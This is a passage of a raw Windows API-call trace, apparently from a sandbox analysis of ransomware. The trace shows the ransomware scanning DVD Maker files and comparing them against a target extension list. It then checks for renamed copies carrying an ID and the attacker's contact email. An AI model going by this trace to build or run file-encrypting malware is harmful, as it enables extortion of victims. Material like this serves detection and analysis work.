[0243.018] CloseHandle (hObject=0x208) returned 1 [0243.018] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png")) returned 0x20 [0243.024] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0243.025] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0243.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.025] lstrlenW (lpString=".doc") returned 4 [0243.025] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.025] lstrlenW (lpString=".docx") returned 5 [0243.025] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0243.025] lstrlenW (lpString=".pdf") returned 4 [0243.025] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.026] lstrlenW (lpString=".xls") returned 4 [0243.026] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.026] lstrlenW (lpString=".xlsx") returned 5 [0243.026] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0243.026] lstrlenW (lpString=".ppt") returned 4 [0243.026] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.026] lstrlenW (lpString=".zip") returned 4 [0243.026] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.026] lstrlenW (lpString=".rar") returned 4 [0243.026] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.026] lstrlenW (lpString=".bz2") returned 4 [0243.026] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.026] lstrlenW (lpString=".7z") returned 3 [0243.026] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.026] lstrlenW (lpString=".dbf") returned 4 [0243.026] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.026] lstrlenW (lpString=".1cd") returned 4 [0243.026] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0243.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.026] lstrlenW (lpString=".jpg") returned 4 [0243.026] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0243.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.026] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.026] lstrlenW (lpString=".doc") returned 4 [0243.026] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.027] lstrlenW (lpString=".docx") returned 5 [0243.027] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0243.027] lstrlenW (lpString=".pdf") returned 4 [0243.027] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.027] lstrlenW (lpString=".xls") returned 4 [0243.027] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.027] lstrlenW (lpString=".xlsx") returned 5 [0243.027] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0243.027] lstrlenW (lpString=".ppt") returned 4 [0243.027] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.027] lstrlenW (lpString=".zip") returned 4 [0243.027] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.027] lstrlenW (lpString=".rar") returned 4 [0243.027] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.027] lstrlenW (lpString=".bz2") returned 4 [0243.027] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.027] lstrlenW (lpString=".7z") returned 3 [0243.027] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.027] lstrlenW (lpString=".dbf") returned 4 [0243.027] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.027] lstrlenW (lpString=".1cd") returned 4 [0243.027] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0243.027] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 81 [0243.027] lstrlenW (lpString=".jpg") returned 4 [0243.027] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0243.028] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0243.028] lstrlenW (lpString="pushplaysubpicture.png") returned 22 [0243.028] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0243.028] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=2962) returned 1 [0243.028] CloseHandle (hObject=0x208) returned 1 [0243.028] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png")) returned 0x20 [0243.028] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0243.028] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0243.028] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.028] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.028] lstrlenW (lpString=".doc") returned 4 [0243.028] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.028] lstrlenW (lpString=".docx") returned 5 [0243.028] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0243.028] lstrlenW (lpString=".pdf") returned 4 [0243.029] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.029] lstrlenW (lpString=".xls") returned 4 [0243.029] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.029] lstrlenW (lpString=".xlsx") returned 5 [0243.029] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0243.029] lstrlenW (lpString=".ppt") returned 4 [0243.029] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.029] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.029] lstrlenW (lpString=".zip") returned 4 [0243.029] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.029] lstrlenW (lpString=".rar") returned 4 [0243.029] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.029] lstrlenW (lpString=".bz2") returned 4 [0243.029] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.029] lstrlenW (lpString=".7z") returned 3 [0243.029] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.029] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.029] lstrlenW (lpString=".dbf") returned 4 [0243.029] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.029] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.029] lstrlenW (lpString=".1cd") returned 4 [0243.029] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0243.029] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.029] lstrlenW (lpString=".jpg") returned 4 [0243.029] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0243.029] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.029] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.029] lstrlenW (lpString=".doc") returned 4 [0243.029] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.030] lstrlenW (lpString=".docx") returned 5 [0243.030] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0243.030] lstrlenW (lpString=".pdf") returned 4 [0243.030] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.030] lstrlenW (lpString=".xls") returned 4 [0243.030] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.030] lstrlenW (lpString=".xlsx") returned 5 [0243.030] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0243.030] lstrlenW (lpString=".ppt") returned 4 [0243.030] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.030] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.030] lstrlenW (lpString=".zip") returned 4 [0243.030] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.030] lstrlenW (lpString=".rar") returned 4 [0243.030] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.030] lstrlenW (lpString=".bz2") returned 4 [0243.030] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.030] lstrlenW (lpString=".7z") returned 3 [0243.030] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.030] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.030] lstrlenW (lpString=".dbf") returned 4 [0243.030] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.030] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.030] lstrlenW (lpString=".1cd") returned 4 [0243.030] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0243.030] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 71 [0243.030] lstrlenW (lpString=".jpg") returned 4 [0243.030] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0243.031] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0243.031] lstrlenW (lpString="Heart_ButtonGraphic.png") returned 23 [0243.031] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0243.031] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=30138) returned 1 [0243.031] CloseHandle (hObject=0x208) returned 1 [0243.032] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png")) returned 0x20 [0243.032] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0243.032] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0243.032] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.032] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.032] lstrlenW (lpString=".doc") returned 4 [0243.032] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.032] lstrlenW (lpString=".docx") returned 5 [0243.032] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0243.032] lstrlenW (lpString=".pdf") returned 4 [0243.032] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.032] lstrlenW (lpString=".xls") returned 4 [0243.032] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.032] lstrlenW (lpString=".xlsx") returned 5 [0243.032] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0243.032] lstrlenW (lpString=".ppt") returned 4 [0243.032] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.032] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.032] lstrlenW (lpString=".zip") returned 4 [0243.032] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.032] lstrlenW (lpString=".rar") returned 4 [0243.032] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.032] lstrlenW (lpString=".bz2") returned 4 [0243.033] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.033] lstrlenW (lpString=".7z") returned 3 [0243.033] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.033] lstrlenW (lpString=".dbf") returned 4 [0243.033] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.033] lstrlenW (lpString=".1cd") returned 4 [0243.033] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0243.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.033] lstrlenW (lpString=".jpg") returned 4 [0243.033] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0243.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.033] lstrlenW (lpString=".doc") returned 4 [0243.033] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.033] lstrlenW (lpString=".docx") returned 5 [0243.033] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0243.033] lstrlenW (lpString=".pdf") returned 4 [0243.033] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.033] lstrlenW (lpString=".xls") returned 4 [0243.033] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.033] lstrlenW (lpString=".xlsx") returned 5 [0243.033] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0243.033] lstrlenW (lpString=".ppt") returned 4 [0243.033] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.033] lstrlenW (lpString=".zip") returned 4 [0243.034] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.034] lstrlenW (lpString=".rar") returned 4 [0243.034] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.034] lstrlenW (lpString=".bz2") returned 4 [0243.034] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.034] lstrlenW (lpString=".7z") returned 3 [0243.034] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.034] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.034] lstrlenW (lpString=".dbf") returned 4 [0243.034] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.034] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.034] lstrlenW (lpString=".1cd") returned 4 [0243.034] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0243.034] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 67 [0243.034] lstrlenW (lpString=".jpg") returned 4 [0243.034] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0243.035] lstrcmpiW (lpString1=".bmp", lpString2=".php") returned -1 [0243.035] lstrlenW (lpString="heart_glass_Thumbnail.bmp") returned 25 [0243.035] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0243.035] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=5072) returned 1 [0243.035] CloseHandle (hObject=0x208) returned 1 [0243.035] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp")) returned 0x20 [0243.035] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0243.035] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0243.035] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.035] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.035] lstrlenW (lpString=".doc") returned 4 [0243.035] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0243.035] lstrlenW (lpString=".docx") returned 5 [0243.036] lstrcmpiW (lpString1=".docx", lpString2="l.bmp") returned -1 [0243.036] lstrlenW (lpString=".pdf") returned 4 [0243.036] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString=".xls") returned 4 [0243.036] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString=".xlsx") returned 5 [0243.036] lstrcmpiW (lpString1=".xlsx", lpString2="l.bmp") returned -1 [0243.036] lstrlenW (lpString=".ppt") returned 4 [0243.036] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.036] lstrlenW (lpString=".zip") returned 4 [0243.036] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString=".rar") returned 4 [0243.036] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString=".bz2") returned 4 [0243.036] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString=".7z") returned 3 [0243.036] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0243.036] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.036] lstrlenW (lpString=".dbf") returned 4 [0243.036] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.036] lstrlenW (lpString=".1cd") returned 4 [0243.036] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0243.036] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.036] lstrlenW (lpString=".jpg") returned 4 [0243.036] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0243.036] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.037] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.037] lstrlenW (lpString=".doc") returned 4 [0243.037] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString=".docx") returned 5 [0243.037] lstrcmpiW (lpString1=".docx", lpString2="l.bmp") returned -1 [0243.037] lstrlenW (lpString=".pdf") returned 4 [0243.037] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString=".xls") returned 4 [0243.037] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString=".xlsx") returned 5 [0243.037] lstrcmpiW (lpString1=".xlsx", lpString2="l.bmp") returned -1 [0243.037] lstrlenW (lpString=".ppt") returned 4 [0243.037] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.037] lstrlenW (lpString=".zip") returned 4 [0243.037] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString=".rar") returned 4 [0243.037] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString=".bz2") returned 4 [0243.037] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString=".7z") returned 3 [0243.037] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0243.037] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.037] lstrlenW (lpString=".dbf") returned 4 [0243.037] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0243.037] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.037] lstrlenW (lpString=".1cd") returned 4 [0243.037] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0243.037] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 69 [0243.037] lstrlenW (lpString=".jpg") returned 4 [0243.037] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0243.038] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0243.038] lstrlenW (lpString="Heart_SelectionSubpicture.png") returned 29 [0243.038] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0243.038] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=4728) returned 1 [0243.038] CloseHandle (hObject=0x208) returned 1 [0243.038] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png")) returned 0x20 [0243.038] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0243.038] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0243.038] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 73 [0243.038] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 73 [0243.038] lstrlenW (lpString=".doc") returned 4 [0243.038] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0243.038] lstrlenW (lpString=".docx") returned 5 [0243.038] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0243.038] lstrlenW (lpString=".pdf") returned 4 [0243.039] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0243.039] lstrlenW (lpString=".xls") returned 4 [0243.039] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0243.039] lstrlenW (lpString=".xlsx") returned 5 [0243.039] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0243.039] lstrlenW (lpString=".ppt") returned 4 [0243.039] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0243.039] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 73 [0243.039] lstrlenW (lpString=".zip") returned 4 [0243.039] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0243.039] lstrlenW (lpString=".rar") returned 4 [0243.039] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0243.039] lstrlenW (lpString=".bz2") returned 4 [0243.039] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0243.039] 